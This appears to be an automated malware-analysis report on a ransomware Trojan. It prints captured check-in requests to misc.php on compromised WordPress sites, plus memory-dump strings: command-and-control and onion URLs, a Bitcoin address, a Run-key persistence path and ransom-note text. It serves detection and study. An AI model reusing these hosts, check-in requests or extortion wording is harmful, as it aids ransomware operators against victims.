<html><head><meta http-equiv="refresh" content="0;url=http://ww2.bostonhygiene.com/?folio=9POR7JU99" /><META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE,NO_STORE"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"/>....<META HTTP-EQUIV="EXPIRES" CONTENT="Mon, 22 Jul 2002 11:12:01 GMT"/></head><body onbeforeunload="" onunload=""><script language='javascript' type='text/javascript'>try.....{..... var rurl = 'hXXp://ww2.bostonhygiene.com/?folio=9POR7JU99'......window.top.location.replace(rurl);.....} catch(exception) {......document.write("This page has moved, <A HREF='http://ww2.bostonhygiene.com/?folio=9POR7JU99'>Click here</A> to go there.");.....}</script><noscript>This page has moved, <A HREF='hXXp://ww2.bostonhygiene.com/?folio=9POR7JU99'>Click here</A> to go there.</noscript></body></html>..

GET /wp-content/plugins/custom-permalinks/misc.php?1A6F2F8D95EAE2533634E025906C5028D237F1B54EC69E25FD1FDF3C098E9A435C24AB2282AE252530C48C1BD89C293EFCB39E90E3491BD3466F539B316948B803BA57BDEC99CE90BF76FE045BFBE1F845D5A9FAF3CCD954D0261661E41A4134617B69DA317FD9D6CD52901D0FBBBCB3EACFAB1C7339B664B2B4C15C5C63178FBBE21EA108F7E6EE757E35F94FB0BCA38CAFDAB1159E778662F88FCD286D556CAA93E0833CDA0F234B37B9A0D00455AF10AD7F5FB69BA4A1F443B53C321341F4571731389F344E9913E924A401BB0B1D89E6A941807F5ED012C4DAFFB91B3DEB6234D2C5FD3AC35F7749F013386E1320C66822505065C14CF9072FE9749EA91EF795F5633B7ACD056CBF2B0B085F85B40ED4B47F58D45615D3B14329AB8082E4EAAA132FAF9652709D7DB7D7F2E302407033143EF625EE6F7F89DB4A564D6876C2B21DBB39FD7F2C5953D4CC81FE6A21180726B1DF5A76160FC9BF513B695310 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0

Host: elifeline.us

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Date: Tue, 17 May 2016 07:51:53 GMT

Server: Apache

X-Powered-By: PHP/5.5.31

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Link: <hXXp://elifeline.us/wp-json/>; rel="hXXps://api.w.org/"

MS-Author-Via: DAV

Vary: Accept-Encoding,Cookie

Content-Type: text/html; charset=UTF-8

Set-Cookie: PHPSESSID=f38rdeepiuunl8d1hjfse8gs3lvfes1b7rft8c4hboqft6bvmmmf6is9mf0qmmgd05gishbkp00rcsf64gi54dd1ivb3bdduqkovi31; path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

2000..<!DOCTYPE html>.<!--[if IE 7]>.<html id="ie7" lang="en-US"> <![endif]-->.<!--[if IE 8]>.<html id="ie8" lang="en-US"> <![endif]-->.<!--[if IE 9]>.<html id="ie9" lang="en-US"> <![endif]-->.<!--[if !(IE 6) | !(IE 7) | !(IE 8) ] | !(IE 9) ><!-->.<html lang="en-US"> <!--<![endif]-->.<head>.<meta charset="UTF-8" />.<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes' />.<title>Page not found | </title>..<link rel="profile" href="hXXp://gmpg.org/xfn/11" />.<link rel="pingback" href="hXXp://elifeline.us/xmlrpc.php" />.<!--[if lt IE 9]>.<script src="hXXp://elifeline.us/wp-content/themes/weaver-ii-pro 2/js/html5.js" type="text/javascript"></script>.<![endif]-->..<script type="text/javascript">var weaverIsMobile=false;var weaverIsSimMobile=false;var weaverIsStacked=false;var weaverThemeWidth=940;var weaverMenuThreshold=640;var weaverHideMenuBar=false;var weaverMobileDisabled=false;var weaverFlowToBottom=false;var weaverHideTooltip=false;var weaverUseSuperfish=false;</script>.<link rel="alternate" type="application/rss xml" title=" » Feed" href="hXXp://elifeline.us/feed/" />.<link rel="alternate" type="application/rss xml" title=" » Comments Feed" href="hXXp://elifeline.us/comments/feed/" />...<script type="text/javascript">....window._wpemojiSettings = {"baseUrl":"http

<<< skipped >>>

GET /wp-content/plugins/share-buttons-wp/misc.php?1A6F2F8D95EAE2533634E025906C5028D237F1B54EC69E25FD1FDF3C098E9A435C24AB2282AE252530C48C1BD89C293EFCB39E90E3491BD3466F539B316948B803BA57BDEC99CE90BF76FE045BFBE1F845D5A9FAF3CCD954D0261661E41A4134617B69DA317FD9D6CD52901D0FBBBCB3EACFAB1C7339B664B2B4C15C5C63178FBBE21EA108F7E6EE757E35F94FB0BCA38CAFDAB1159E778662F88FCD286D556CAA93E0833CDA0F234B37B9A0D00455AF10AD7F5FB69BA4A1F443B53C321341F4571731389F344E9913E924A401BB0B1D89E6A941807F5ED012C4DAFFB91B3DEB6234D2C5FD3AC35F7749F013386E1320C66822505065C14CF9072FE9749EA91EF795F5633B7ACD056CBF2B0B085F85B40ED4B47F58D45615D3B14329AB8082E47A0936EA2859AB0894FA542D6FB1C9DEDF0C582FDFF63D6B9ABB619FD7B1334F65A1FB1B246302127467D3135D47BD849B346DD6E6AFC12BCC8DC0DD37C7EBA8 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0

Host: prettybaked.pl

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Content-Type: text/html; charset=UTF-8

Link: <hXXp://prettybaked.pl/wp-json/>; rel="hXXps://api.w.org/"

Transfer-Encoding: chunked

Date: Tue, 17 May 2016 07:51:53 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Connection: close

2000..<!DOCTYPE html>.<html lang="pl-PL">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <title>Strona nie zosta..a znaleziona | PrettyBaked</title>. <link rel="profile" href="hXXp://gmpg.org/xfn/11">. <link rel="pingback" href="hXXp://prettybaked.pl/xmlrpc.php">. <link rel="alternate" type="application/rss xml" title="PrettyBaked » Kana.. z wpisami" href="hXXp://prettybaked.pl/index.php/feed/" />.<link rel="alternate" type="application/rss xml" title="PrettyBaked » Kana.. z komentarzami" href="hXXp://prettybaked.pl/index.php/comments/feed/" />...<script type="text/javascript">....window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/prettybaked.pl\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.5.1"}};....!function(a,b,c){function d(a){var c,d,e,f=b.createElement("canvas"),g=f.getContext&&f.getContext("2d"),h=String.fromCharCode;if(!g||!g.fillText)return!1;switch(g.textBaseline="top",g.font="600 32px Arial",a){case"flag":return g.fillText(h(55356,56806,55356,56826),0,0),f.toDataURL().length>3e3;case"diversity":return g.fillText(h(55356,57221),0,0),c=g.getImageData(16,16,1,1).data,d=c[0] "," c[1] "," c[2] "," c[3],g.fillText(h(55356,57221,55356,57343),0,0),c=g.getImageData(16,16,1,1).data,e=c[0] "," c[1] "," c[2] "," c[3],d!==e;case"simple":return g.fillText(h(55357,56835),0,

<<< skipped >>>

GET /wp-content/plugins/wp-handy-lightbox/misc.php?1A6F2F8D95EAE2533634E025906C5028D237F1B54EC69E25FD1FDF3C098E9A435C24AB2282AE252530C48C1BD89C293EFCB39E90E3491BD3466F539B316948B803BA57BDEC99CE90BF76FE045BFBE1F845D5A9FAF3CCD954D0261661E41A4134617B69DA317FD9D6CD52901D0FBBBCB3EACFAB1C7339B664B2B4C15C5C63178FBBE21EA108F7E6EE757E35F94FB0BCA38CAFDAB1159E778662F88FCD286D556CAA93E0833CDA0F234B37B9A0D00455AF10AD7F5FB69BA4A1F443B53C321341F4571731389F344E9913E924A401BB0B1D89E6A941807F5ED012C4DAFFB91B3DEB6234D2C5FD3AC35F7749F013386E1320C66822505065C14CF9072FE9749EA91EF795F5633B7ACD056CBF2B0B085F85B40ED4B47F58D45615D3B14329AB8082E4BD36E47004EDFDD34308C01B8FEAEC4D5AD28C8D8561693F231BA5035DA4348A94E59551129949902AF95641E935018A484346433AA1DD4D4F3D9019FC0B6B7C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0

Host: majowy.info

Connection: Keep-Alive

HTTP/1.1 404

Date: Tue, 17 May 2016 07:51:51 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: no-cache, must-revalidate, max-age=0

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Link: <hXXp://majowy.info/wp-json/>; rel="hXXps://api.w.org/"

Pragma: no-cache

Server: IdeaWebServer/v0.80

3ec3..<!DOCTYPE html>.<!--[if IE 7]>.<html class="ie ie7" lang="pl-PL">.<![endif]-->.<!--[if IE 8]>.<html class="ie ie8" lang="pl-PL">.<![endif]-->.<!--[if !(IE 7) & !(IE 8)]><!-->.<html lang="pl-PL">.<!--<![endif]-->.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width">..<title>Strona nie zosta..a znaleziona | Rzeki dla rower..w</title>..<link rel="profile" href="hXXp://gmpg.org/xfn/11">..<link rel="pingback" href="http://majowy.info/xmlrpc.php">..<!--[if lt IE 9]>..<script src="hXXp://majowy.info/wp-content/themes/twentyfourteen/js/html5.js"></script>..<![endif]-->..... <link rel="alternate" type="application/rss xml" title="Rzeki dla rower..w » Kana.. z wpisami" href="hXXp://majowy.info/feed/" />.<link rel="alternate" type="application/rss xml" title="Rzeki dla rower..w » Kana.. z komentarzami" href="hXXp://majowy.info/comments/feed/" />...<script type="text/javascript">....window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/majowy.info\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.4.3"}};....!function(a,b,c){function d(a){var c,d,e,f=b.createElement("canvas"),g=f.getContext&&f.getContext("2d"),h=String.fromCharCode;return g&&g.fillText?(g.textBaseline="top",g.font="600 32px Arial","flag"===a?(g.fillText(h(55356,56806,55356,56826),0,

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

vcwrms.exe_1572:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

SSSSh

SSSSh

PSSSSSSh

PSSSSSSh

SSSh`GA

SSSh`GA

operator

operator

GetProcessWindowStation

GetProcessWindowStation

advapi32.dll

advapi32.dll

user32.dll

user32.dll

ws2_32.dll

ws2_32.dll

ntdll.dll

ntdll.dll

winsta.dll

winsta.dll

shell32.dll

shell32.dll

wininet.dll

wininet.dll

urlmon.dll

urlmon.dll

nspr4.dll

nspr4.dll

ssl3.dll

ssl3.dll

winmm.dll

winmm.dll

cabinet.dll

cabinet.dll

opera.dll

opera.dll

Gdi32.dll

Gdi32.dll

gdiplus.dll

gdiplus.dll

crypt32.dll

crypt32.dll

SHLWAPI.dll

SHLWAPI.dll

Imagehlp.dll

Imagehlp.dll

psapi.dll

psapi.dll

olE32.dll

olE32.dll

winspool.drv

winspool.drv

Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0

Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0

hXXps://7vhbukzxypxh3xfy.onion.to/inst.php

hXXps://7vhbukzxypxh3xfy.onion.to/inst.php

%s?%s

%s?%s

hXXp://myexternalip.com/raw

hXXp://myexternalip.com/raw

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

BJsgrglsH25MSGNdaDs9CNFAYw420C==

BJsgrglsH25MSGNdaDs9CNFAYw420C==

More information about the encryption keys using RSA-2048 can be found here: hXXp://en.wikipedia.org/wiki/RSA_(cryptosystem)

More information about the encryption keys using RSA-2048 can be found here: hXXp://en.wikipedia.org/wiki/RSA_(cryptosystem)

Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.

Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.

All your files were encrypted with the public key, which has been transferred to your computer via the Internet.

All your files were encrypted with the public key, which has been transferred to your computer via the Internet.

Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.

Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.

Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.

Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.

1. hXXp://6fjhsy630.ylk768dhg67fj.com/%S

1. hXXp://6fjhsy630.ylk768dhg67fj.com/%S

2. hXXp://djru34dnd.lgk749kch8ej.com/%S

2. hXXp://djru34dnd.lgk749kch8ej.com/%S

3. hXXps://7vhbukzxypxh3xfy.onion.to/%S

3. hXXps://7vhbukzxypxh3xfy.onion.to/%S

1. Download and install tor-browser: hXXp://VVV.torproject.org/projects/torbrowser.html.en

1. Download and install tor-browser: hXXp://VVV.torproject.org/projects/torbrowser.html.en

3. Type in the address bar: 7vhbukzxypxh3xfy.onion/%S

3. Type in the address bar: 7vhbukzxypxh3xfy.onion/%S

IMPORTANT INFORMATION:

IMPORTANT INFORMATION:

hXXp://6fjhsy630.ylk768dhg67fj.com/%S

hXXp://6fjhsy630.ylk768dhg67fj.com/%S

hXXp://djru34dnd.lgk749kch8ej.com/%S

hXXp://djru34dnd.lgk749kch8ej.com/%S

hXXps://7vhbukzxypxh3xfy.onion.to/%S

hXXps://7vhbukzxypxh3xfy.onion.to/%S

Your personal page (using TOR): 7vhbukzxypxh3xfy.onion/%S

Your personal page (using TOR): 7vhbukzxypxh3xfy.onion/%S

Your personal identification number (if you open the site (or TOR 's) directly): %S

Your personal identification number (if you open the site (or TOR 's) directly): %S

.ttl { font-size:13px; color:880000; }

.ttl { font-size:13px; color:880000; }


More information about the encryption RSA-2048 can be found here: hXXp://en.wikipedia.org/wiki/RSA_(cryptosystem)


More information about the encryption RSA-2048 can be found here: hXXp://en.wikipedia.org/wiki/RSA_(cryptosystem)

but with our help, you can restore them.

How did this happen?
Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.

but with our help, you can restore them.

How did this happen?
Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.


All your files were encrypted with the public key, which has been


All your files were encrypted with the public key, which has been

only possible with the help of the private key and decrypt program,

only possible with the help of the private key and decrypt program,

for the specified time then the conditions for obtaining the private key will be changed.

for the specified time then the conditions for obtaining the private key will be changed.

1.hXXp://6fjhsy630.ylk768dhg67fj.com/%S

1.hXXp://6fjhsy630.ylk768dhg67fj.com/%S

2.hXXp://djru34dnd.lgk749kch8ej.com/%S

2.hXXp://djru34dnd.lgk749kch8ej.com/%S

3.hXXps://7vhbukzxypxh3xfy.onion.to/%S

3.hXXps://7vhbukzxypxh3xfy.onion.to/%S

hXXp://VVV.torproject.org/projects/torbrowser.html.en

hXXp://VVV.torproject.org/projects/torbrowser.html.en

3. Type in the address bar: 7vhbukzxypxh3xfy.onion/%S

3. Type in the address bar: 7vhbukzxypxh3xfy.onion/%S

4. Follow the instructions on the site.



IMPORTANT INFORMATION:

4. Follow the instructions on the site.



IMPORTANT INFORMATION:


hXXp://6fjhsy630.ylk768dhg67fj.com/%S


hXXp://6fjhsy630.ylk768dhg67fj.com/%S

hXXp://djru34dnd.lgk749kch8ej.com/%S

hXXp://djru34dnd.lgk749kch8ej.com/%S

hXXps://7vhbukzxypxh3xfy.onion.to/%S

hXXps://7vhbukzxypxh3xfy.onion.to/%S

7vhbukzxypxh3xfy.onion/%S

7vhbukzxypxh3xfy.onion/%S

%S

%S

dmin.exe

dmin.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

PSAPI.DLL

PSAPI.DLL

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

RegCreateKeyExW

RegCreateKeyExW

RegFlushKey

RegFlushKey

RegCloseKey

RegCloseKey

RegCreateKeyExA

RegCreateKeyExA

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteExW

ShellExecuteExW

ShellExecuteExA

ShellExecuteExA

ShellExecuteW

ShellExecuteW

SHELL32.dll

SHELL32.dll

ole32.dll

ole32.dll

MPR.dll

MPR.dll

InternetOpenUrlA

InternetOpenUrlA

InternetCrackUrlA

InternetCrackUrlA

HttpOpenRequestA

HttpOpenRequestA

HttpSendRequestA

HttpSendRequestA

WININET.dll

WININET.dll

GetCPInfo

GetCPInfo

8$4,8$4

8$4,8$4

2.1.0

2.1.0

1NDKiaipJ6WmSXwhbgPCRSikeYCEXe8FNc

1NDKiaipJ6WmSXwhbgPCRSikeYCEXe8FNc

37.57.16.189

37.57.16.189

1. hXXp://6fjhsy630.ylk768dhg67fj.com/7A3DC8A074539F6

1. hXXp://6fjhsy630.ylk768dhg67fj.com/7A3DC8A074539F6

2. hXXp://djru34dnd.lgk749kch8ej.com/7A3DC8A074539F6

2. hXXp://djru34dnd.lgk749kch8ej.com/7A3DC8A074539F6

3. hXXps://7vhbukzxypxh3xfy.onion.to/7A3DC8A074539F6

3. hXXps://7vhbukzxypxh3xfy.onion.to/7A3DC8A074539F6

3. Type in the address bar: 7vhbukzxypxh3xfy.onion/7A3DC8A074539F6

3. Type in the address bar: 7vhbukzxypxh3xfy.onion/7A3DC8A074539F6

hXXp://6fjhsy630.ylk768dhg67fj.com/7A3DC8A074539F6

hXXp://6fjhsy630.ylk768dhg67fj.com/7A3DC8A074539F6

hXXp://djru34dnd.lgk749kch8ej.com/7A3DC8A074539F6

hXXp://djru34dnd.lgk749kch8ej.com/7A3DC8A074539F6

hXXps://7vhbukzxypxh3xfy.onion.to/7A3DC8A074539F6

hXXps://7vhbukzxypxh3xfy.onion.to/7A3DC8A074539F6

Your personal page (using TOR): 7vhbukzxypxh3xfy.onion/7A3DC8A074539F6

Your personal page (using TOR): 7vhbukzxypxh3xfy.onion/7A3DC8A074539F6

1.hXXp://6fjhsy630.ylk768dhg67fj.com/7A3DC8A074539F6

1.hXXp://6fjhsy630.ylk768dhg67fj.com/7A3DC8A074539F6

2.hXXp://djru34dnd.lgk749kch8ej.com/7A3DC8A074539F6

2.hXXp://djru34dnd.lgk749kch8ej.com/7A3DC8A074539F6

3.hXXps://7vhbukzxypxh3xfy.onion.to/7A3DC8A074539F6

3.hXXps://7vhbukzxypxh3xfy.onion.to/7A3DC8A074539F6

3. Type in the address bar: 7vhbukzxypxh3xfy.onion/7A3DC8A074539F6

3. Type in the address bar: 7vhbukzxypxh3xfy.onion/7A3DC8A074539F6


hXXp://6fjhsy630.ylk768dhg67fj.com/7A3DC8A074539F6


hXXp://6fjhsy630.ylk768dhg67fj.com/7A3DC8A074539F6

hXXp://djru34dnd.lgk749kch8ej.com/7A3DC8A074539F6

hXXp://djru34dnd.lgk749kch8ej.com/7A3DC8A074539F6

hXXps://7vhbukzxypxh3xfy.onion.to/7A3DC8A074539F6

hXXps://7vhbukzxypxh3xfy.onion.to/7A3DC8A074539F6

7vhbukzxypxh3xfy.onion/7A3DC8A074539F6

7vhbukzxypxh3xfy.onion/7A3DC8A074539F6

6 7 757}7

6 7 757}7

?!?/?4?{?

?!?/?4?{?

0%0,030:0

0%0,030:0

7$7(7,7|7

7$7(7,7|7

mscoree.dll

mscoree.dll

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

WUSER32.DLL

WUSER32.DLL

dSoftware\%s

dSoftware\%s

S-1-5-18\Software\%s

S-1-5-18\Software\%s

%X%X%X%X%X%X%X%X

%X%X%X%X%X%X%X%X

%s\%s_%s.txt

%s\%s_%s.txt

%s\%s_%s.html

%s\%s_%s.html

ADVAPI32.DLL

ADVAPI32.DLL

KERNEL32.DLL

KERNEL32.DLL

NETAPI32.DLL

NETAPI32.DLL

%s\system32\cmd.exe

%s\system32\cmd.exe

/c start "" "%s"

/c start "" "%s"

:Zone.Identifier

:Zone.Identifier

%s\howto_recover_files.txt

%s\howto_recover_files.txt

%s\howto_recover_files.html

%s\howto_recover_files.html

%s\%s

%s\%s

%s\vcw%s.exe

%s\vcw%s.exe

o%systemroot%\system32\

o%systemroot%\system32\

%Documents and Settings%\%current user%\Application Data\vcwrms.exe

%Documents and Settings%\%current user%\Application Data\vcwrms.exe

%Documents and Settings%\%current user%\Application Data\vcwrms.exe:Zone.Identifier

%Documents and Settings%\%current user%\Application Data\vcwrms.exe:Zone.Identifier

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Desktop

%Documents and Settings%\%current user%\Desktop

%Documents and Settings%\All Users\Desktop

%Documents and Settings%\All Users\Desktop

%WinDir%

%WinDir%

%Program Files%

%Program Files%

%Documents and Settings%\All Users\Application Data

%Documents and Settings%\All Users\Application Data

%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning

%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning

%Documents and Settings%\%current user%\My Documents\recover_file_gtdrleovk.txt

%Documents and Settings%\%current user%\My Documents\recover_file_gtdrleovk.txt

2.0.0.1

2.0.0.1

1.0.0.2

1.0.0.2

vcwrms.exe_1572_rwx_003C0000_00004000:

ADVAPI32.DLL

ADVAPI32.DLL

USER32.DLL

USER32.DLL

_acmdln

_acmdln

RegCloseKey

RegCloseKey

vcwrms.exe_1572_rwx_003E0000_00003000:

`y%d=

`y%d=

NOTEPAD.EXE_1092:

.text

.text

`.data

`.data

.rsrc

.rsrc

comdlg32.dll

comdlg32.dll

SHELL32.dll

SHELL32.dll

WINSPOOL.DRV

WINSPOOL.DRV

COMCTL32.dll

COMCTL32.dll

msvcrt.dll

msvcrt.dll

ADVAPI32.dll

ADVAPI32.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

GDI32.dll

GDI32.dll

USER32.dll

USER32.dll

notepad.chm

notepad.chm

hhctrl.ocx

hhctrl.ocx

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

notepad.pdb

notepad.pdb

t%SSh

t%SSh

_acmdln

_acmdln

RegCloseKey

RegCloseKey

RegCreateKeyW

RegCreateKeyW

RegOpenKeyExA

RegOpenKeyExA

SetViewportExtEx

SetViewportExtEx

GetKeyboardLayout

GetKeyboardLayout

name="Microsoft.Windows.Shell.notepad"

name="Microsoft.Windows.Shell.notepad"

version="5.1.0.0"

version="5.1.0.0"

Windows Shell

Windows Shell

name="Microsoft.Windows.Common-Controls"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

publicKeyToken="6595b64144ccf1df"

&*$#$$#$*

&*$#$$#$*

MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM

MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM

*.txt

*.txt

/.SETUP

/.SETUP

Text Documents (*.txt)

Text Documents (*.txt)

%Documents and Settings%\%current user%\Desktop\howto_recover_files.txt

%Documents and Settings%\%current user%\Desktop\howto_recover_files.txt

5.1.2600.5512 (xpsp.080413-2105)

5.1.2600.5512 (xpsp.080413-2105)

NOTEPAD.EXE

NOTEPAD.EXE

Windows

Windows

Operating System

Operating System

5.1.2600.5512

5.1.2600.5512

notepad.hlp

notepad.hlp

You cannot quit Windows because the Save As dialog

You cannot quit Windows because the Save As dialog

dialog box, and then try quitting Windows again.

dialog box, and then try quitting Windows again.

Common Dialog error (0xx)

Common Dialog error (0xx)

Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.

Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.

Not a valid file name.MCannot create the %% file.

Not a valid file name.MCannot create the %% file.

Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.

Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.

Page %d

Page %d

Ln %d, Col %d

Ln %d, Col %d